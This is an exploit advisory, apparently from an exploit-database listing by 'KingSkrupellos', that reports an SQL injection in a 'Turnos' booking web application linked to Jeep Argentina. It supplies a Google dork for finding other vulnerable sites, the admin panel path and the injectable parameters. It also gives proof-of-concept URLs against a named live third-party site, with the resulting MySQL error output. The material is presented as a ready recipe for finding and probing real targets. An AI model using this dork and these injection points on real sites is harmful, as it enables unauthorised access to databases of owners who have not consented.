#################################################################################################
# Exploit Title : Sitio oficial de Jeep® Argentina Powered By Turnos SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/09/2018
# Vendor Homepage : jeep.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''©2017 FCA US LLC. Todos los derechos reservados.Chrysler, Dodge, Jeep, Ram, Mopar y SRT son marcas registradas de FCA US LLC.''
Admin Control Panel Path => /admin/
# Exploit :
/index.php?action=turnos&id_actividad=[SQL Injection]
/index.php?action=turnos&id_actividad=[ID-NUMBER]&id_vehiculo=&year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&desde=[ID-NUMBER]&hasta=[SQL Injection]
#################################################################################################
# Example Site =>
offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3%27 => [ Proof of Concept ] => archive.is/c9aOS
offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3&id_vehiculo=&year=2019&month=02&day=20&desde=1800&hasta=2130%27 => [ Proof of Concept ] => archive.is/rAbHR
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/adminh4/public_html/turnos.php on line 20
mysql_error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################